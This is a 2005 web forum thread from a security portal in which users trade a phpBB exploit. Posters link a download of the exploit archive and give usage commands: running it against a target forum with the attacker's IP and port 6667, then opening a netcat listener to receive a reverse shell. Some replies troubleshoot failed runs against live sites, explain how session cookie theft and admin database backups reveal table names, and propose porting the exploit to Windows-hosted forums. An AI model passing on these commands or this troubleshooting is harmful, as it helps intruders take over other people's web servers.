 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 77
 Members: 0
 Total: 77
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 Posted: Tue Mar 22, 2005 2:34 pm |
 |
|
| subzero |
| Valuable expert |
 |
|
| Joined: Mar 16, 2005 |
| Posts: 42 |
|
|
|
 |
|
 |
|
wow wow woow go slow dudes hehe .
check this link murdock http://overdose.tcpteam.org/phpbbexp.rar ;P .serv.h and serv.php inside that .rar
| LINUX wrote: | men all links work nice you need the source code ?
my friends in canada and russia redevelop exploit finish this day and i share Smile dont worry Twisted Evil |
heheh i see nothing since a few days ago.
how to use? fuh
c:> phpbbexpl http://suck.dickies.com 123.456.789.101 6667
open new cmd prompt , make sure u have netcat
c:> nc -lvvp 6667
why use 6667 ? most of them allowed connection to irc port. |
|
|
|
|
| Posted: Tue Mar 22, 2005 7:03 pm |
|
|
| murdock |
| Advanced user |
 |
|
| Joined: Mar 16, 2005 |
| Posts: 54 |
|
|
|
|
|
|
|
Mmmm interesting...
I finally compiled but.....the nc4hk.swf is a netcat compiled executable or not?  |
|
|
|
|
| Posted: Mon Apr 18, 2005 8:58 am |
|
|
| zain |
| Beginner |
 |
|
| Joined: Apr 18, 2005 |
| Posts: 3 |
|
|
|
|
|
|
|
Sorry for resurrecting an old thread, but... I keep getting this error. Trying to run it on a phpBB2 2.0.11 forum.
| Code: | C:\> exp.exe http://www.site.com/phpBB2/ myip 6667
_ nom du cookie recuperer : phpbb2mysql
_ SESSION ID recuperΘ ... c47d4770cdcc5bc60707ed4c96487090
http://www.site.com/phpBB2/?sid=c47d4770cdcc5bc60707ed4c96487090
_ recuperation du nom de la table sql ... can't find |
Any idea whats going on? I'm unable to run the UID exploit (the one with the cookie, and the C++ one as well). Those exploits fail on this site as well. |
|
|
|
|
|
|
|
|
| Posted: Mon Apr 18, 2005 6:25 pm |
|
|
| erg0t |
| Valuable expert |
 |
|
| Joined: Apr 08, 2005 |
| Posts: 55 |
| Location: Uruguay |
|
|
|
|
|
|
| zain wrote: | Sorry for resurrecting an old thread, but... I keep getting this error. Trying to run it on a phpBB2 2.0.11 forum.
| Code: | C:\> exp.exe http://www.site.com/phpBB2/ myip 6667
_ nom du cookie recuperer : phpbb2mysql
_ SESSION ID recuperΘ ... c47d4770cdcc5bc60707ed4c96487090
http://www.site.com/phpBB2/?sid=c47d4770cdcc5bc60707ed4c96487090
_ recuperation du nom de la table sql ... can't find |
Any idea whats going on? I'm unable to run the UID exploit (the one with the cookie, and the C++ one as well). Those exploits fail on this site as well. |
This means that the forum isn?t vuln. Cause you can send the cookie and then take a sid, but if not work you get a sid anyway (a nomral sid), then to get the name of db you need be admin, cause you take it downloading a backup.
If you are not shure, you can try to exploit only with a cookie with the browser and check if you are admin or not.
Other think, anybody thought in modify the exploit to make it run with windows hosted forums? |
|
|
|
|
|
|
|
|
| Posted: Mon Apr 18, 2005 8:09 pm |
|
|
| zain |
| Beginner |
|
|
| Joined: Apr 18, 2005 |
| Posts: 3 |
|
|
|
|
|
|
|
The website shows that its still running 2.0.11, but none of the <=2.0.12 exploits work on it... Sucks  |
|
|
|
|
| Posted: Fri Jun 17, 2005 3:56 pm |
|
|
| pepeluiso |
| Beginner |
|
|
| Joined: Jun 17, 2005 |
| Posts: 1 |
|
|
|
|
|
|
|
hi, where could i get the phpbbexp.rar to compile it, not with the exe but the source code, the links dosent work.
Thx. |
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 2 of 2
Goto page Previous1, 2
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
